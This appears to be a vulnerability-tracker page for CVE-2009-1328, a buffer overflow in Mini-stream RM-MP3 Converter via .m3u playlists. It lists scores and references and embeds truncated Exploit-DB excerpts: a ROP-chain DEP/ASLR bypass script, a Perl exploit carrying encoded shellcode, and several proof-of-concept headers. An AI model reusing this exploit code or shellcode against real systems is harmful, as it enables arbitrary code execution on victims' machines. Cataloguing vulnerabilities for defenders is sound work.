CVE-2009-1328
published 2009-04-17CVE-2009-1328: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
PriorityP344critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.13%
93.5th percentile
Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-stream | rm-mp3_converter | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Kernel
smb: client: fix OOB in smbCalcSize()
kernel_security·2023-12-15·CVSS 7.1
CVE-2023-6606 [HIGH] smb: client: fix OOB in smbCalcSize()
smb: client: fix OOB in smbCalcSize()
Validate @smb->WordCount to avoid reading off the end of @smb and thus
causing the following KASAN splat:
BUG: KASAN: slab-out-of-bounds in smbCalcSize+0x32/0x40 [cifs]
Read of size 2 at addr ffff88801c024ec5 by task cifsd/1328
CPU: 1 PID: 1328 Comm: cifsd Not tainted 6.7.0-rc5 #9
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS
rel-1.16.2-3-gd478f380-rebuilt.opensuse.org 04/01/2014
Call Trace:
dump_stack_lvl+0x4a/0x80
print_report+0xcf/0x650
? srso_alias_return_thunk+0x5/0xfbef5
? srso_alias_return_thunk+0x5/0xfbef5
? __phys_addr+0x46/0x90
kasan_report+0xd8/0x110
? smbCalcSize+0x32/0x40 [cifs]
? smbCalcSize+0x32/0x40 [cifs]
kasan_check_range+0x105/0x1b0
smbCalcSize+0x32/0x40 [cifs]
checkSMB+0x162/0x370 [cifs]
? __pfx_checkSMB+0x10/0x10 [ci
GHSA
GHSA-v5wv-mgcq-2c5w: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3
ghsa_unreviewed·2022-05-02
CVE-2009-1328 [HIGH] CWE-119 GHSA-v5wv-mgcq-2c5w: Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3
Stack-based buffer overflow in Mini-stream RM-MP3 Converter 3.0.0.7 allows remote attackers to execute arbitrary code via a long URI in a playlist (.m3u) file.
No detection rules found.
Exploit-DB
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
exploitdb·2012-07-27·CVSS 9.3
CVE-2009-1328 [CRITICAL] Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - Local Buffer Overflow (ASLR + DEP Bypass)
---
# Exploit Title: Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 local buffer overflow (\w ASLR and DEP bypass)
# Date: 26 July 2012
# Exploit Author: Gianni Gnesa
# Vendor Homepage: http://mini-stream.net/
# Software Link: http://mini-stream.net/rm-to-mp3-converter/download
# Version: 3.1.2.1.2010.03.30
# Tested on: Windows 7 SP1 (VMware)
# References: CVE-2009-1328, BID 34494
from struct import pack
fname = "rop.m3u"
hdr = "http://."
junk1 = "A" * 17416 # junk
rop = [
0x10041720, # RETN [MSRMfilter03.dll]
0x41414141, # Compensate
#### Save ESP into ESI
# EAX=EBP
0x1001a503, # XOR EAX,EAX / RETN [MSRMfilter03.dll]
0x10051ff5, # ADD EAX,EBP / RETN [MSRMfilter03.dll]
# ESI=EAX
0x1005bb8e,
Exploit-DB
WM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 WM Downloader - '.m3u' Local Stack Overflow (PoC)
WM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * WM Downloader (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D00000
#EBX 00333D78 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F739C
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2FCE0
#EDI 00006619
#EIP 41414
Exploit-DB
RM Downloader - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 RM Downloader - '.m3u' Local Stack Overflow (PoC)
RM Downloader - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *********************************************************
# * RM Downloader (.M3U File) Local Stack Overflow POC *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EI
Exploit-DB
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
Mini-stream Ripper - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# *************************************************************
# * Mini-stream Ripper (.M3U File) Local Stack Overflow POC *
# *************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRipper.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333D60 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F70CC ASCII "AAAA"
#EBP 000FBFB4
#ESI 77C2FCE0 msvcrt.77C2F
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow
exploitdb·2009-04-13
CVE-2009-1328 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow
---
#!/usr/bin/perl
# Mini-stream RM-MP3 Converter Version 3.0.0.7 .m3u Universal Stack Overflow Exploit
# Disoverd By Cyber-Zone
# Exploited By Stack
my $Header = "#EXTM3U\n";
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\
Exploit-DB
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
Mini-stream RM-MP3 Converter 3.0.0.7 - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * Mini-stream RM-MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D20000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000
Exploit-DB
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
exploitdb·2009-04-13
CVE-2009-1330 ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
ASX to MP3 Converter - '.m3u' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
#
#
# ************************************************************************
# * ASX to MP3 Converter (.M3U File) Local Stack Overflow POC *
# ************************************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail : [email protected]
# Home : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
#
#
# Olly registers
#EAX 00000001
#ECX 41414141
#EDX 00D30000
#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESP 000F6C90
#EBP 000FBFB4
#ESI 77C2FCE0
No writeups or analysis indexed.
http://secunia.com/advisories/34653http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49841https://www.exploit-db.com/exploits/8405https://www.exploit-db.com/exploits/8413http://secunia.com/advisories/34653http://www.securityfocus.com/bid/34494https://exchange.xforce.ibmcloud.com/vulnerabilities/49841https://www.exploit-db.com/exploits/8405https://www.exploit-db.com/exploits/8413
2009-04-17
Published